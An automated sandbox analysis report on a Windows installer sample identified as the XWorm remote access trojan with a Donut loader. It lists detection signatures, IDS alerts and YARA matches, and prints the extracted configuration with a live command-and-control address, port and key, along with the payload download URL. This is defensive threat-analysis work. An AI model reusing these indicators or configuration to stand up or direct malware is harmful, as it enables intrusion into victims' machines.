Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
103__Installer.exe

Overview

General Information

Sample name:103__Installer.exe
Analysis ID:1466314
MD5:fba295e75a2c2fd0f205da0a14b76859
SHA1:5f26b9001c0482f1018ce153e58caf61e80ecb8f
SHA256:86ed9f7125ae452d28f9eabd11f5cc9bef747fb751a5aa1283a0ab24952cf508
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 103__Installer.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\103__Installer.exe" MD5: FBA295E75A2C2FD0F205DA0A14B76859)
    • WerFault.exe (PID: 4588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x11dd2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Downloads\ind.jpgWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6af2:$cnc4: POST / HTTP/1.1
    00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: 103__Installer.exe PID: 7572JoeSecurity_XWormYara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.103__Installer.exe.5f70000.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.103__Installer.exe.5f70000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
          0.2.103__Installer.exe.5f70000.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.103__Installer.exe.5f70000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x4cf2:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            Timestamp:07/02/24-19:27:48.531831
            SID:2852874
            Source Port:7000
            Destination Port:49708
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:28:02.641410
            SID:2852923
            Source Port:49708
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:26:31.035751
            SID:2853193
            Source Port:49708
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:25:03.851820
            SID:2855924
            Source Port:49708
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:28:02.635547
            SID:2852870
            Source Port:7000
            Destination Port:49708
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: 103__Installer.exeReversingLabs: Detection: 21%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 103__Installer.exeJoe Sandbox ML: detected
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpackString decryptor: 59.56.110.103
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpackString decryptor: 7000
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpackString decryptor: <123456789>
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpackString decryptor: <Xwormmm>
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpackString decryptor: XWorm V5.6
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpackString decryptor: USB.exe
            Source: 103__Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 103__Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbMZ source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Core.pdbP source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Xml.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006393000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbW source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb<R source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000149E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.pdb@b source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: HPmo0C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5186.tmp.dmp.16.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: gmscoBB.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: %%.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: ?yoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000156B000.00000004.00000020.00020000.00000000.sdmp, WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5186.tmp.dmp.16.dr
            Source: Binary string: @yo.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Management.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: mscorlib.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Management.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb( source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5186.tmp.dmp.16.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32tM source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: B.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\MSVFW32.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.muiJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\en-US\avicap32.dll.muiJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.muiJump to behavior

            Networking

            barindex
            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 59.56.110.103:7000
            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 59.56.110.103:7000 -> 192.168.2.10:49708
            Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.10:49708 -> 59.56.110.103:7000
            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 59.56.110.103:7000 -> 192.168.2.10:49708
            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 59.56.110.103:7000
            Source: Malware configuration extractorURLs: 59.56.110.103
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49707
            Source: global trafficTCP traffic: 192.168.2.10:49707 -> 91.208.240.157:881
            Source: global trafficTCP traffic: 192.168.2.10:49708 -> 59.56.110.103:7000
            Source: Joe Sandbox ViewIP Address: 91.208.240.157 91.208.240.157
            Source: Joe Sandbox ViewASN Name: CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B725AD __EH_prolog,InternetReadFile,0_2_00B725AD
            Source: global trafficHTTP traffic detected: GET /103.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: guanlix.cn
            Source: 103__Installer.exeString found in binary or memory: http://guanlix.cn:881/103.ccp
            Source: 103__Installer.exe, 00000000.00000002.3334093675.00000000014F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://guanlix.cn:881/103.ccpq
            Source: 103__Installer.exe, 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.16.drString found in binary or memory: http://upx.sf.net

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\103__Installer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B8000E0_2_00B8000E
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B85A2A0_2_00B85A2A
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B803AC0_2_00B803AC
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B8738F0_2_00B8738F
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B7FB790_2_00B7FB79
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B80B660_2_00B80B66
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B854D90_2_00B854D9
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B866570_2_00B86657
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B85F7B0_2_00B85F7B
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B8077E0_2_00B8077E
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B87F4F0_2_00B87F4F
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F855D80_2_05F855D8
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F8A6B80_2_05F8A6B8
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F8B3F80_2_05F8B3F8
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F8ED840_2_05F8ED84
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F84D080_2_05F84D08
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F807A00_2_05F807A0
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_05F849C00_2_05F849C0
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: String function: 00B7A940 appears 44 times
            Source: C:\Users\user\Desktop\103__Installer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096
            Source: 103__Installer.exe, 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 103__Installer.exe
            Source: 103__Installer.exe, 00000000.00000000.1236310845.0000000000B93000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindos.exe. vs 103__Installer.exe
            Source: 103__Installer.exeBinary or memory string: OriginalFilenamewindos.exe. vs 103__Installer.exe
            Source: 103__Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@2/7@1/2
            Source: C:\Users\user\Desktop\103__Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccpJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7572
            Source: C:\Users\user\Desktop\103__Installer.exeMutant created: \Sessions\1\BaseNamedObjects\tJeTNPzvlX6aPF3G
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3f431b1f-d465-427a-8041-737422ee2c5fJump to behavior
            Source: 103__Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\103__Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 103__Installer.exeReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Users\user\Desktop\103__Installer.exe "C:\Users\user\Desktop\103__Installer.exe"
            Source: C:\Users\user\Desktop\103__Installer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: 103__Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbMZ source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Core.pdbP source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Xml.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006393000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbW source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb<R source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000149E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.pdb@b source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: HPmo0C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5186.tmp.dmp.16.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER5186.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdb source: WER5186.tmp.dmp.16.dr
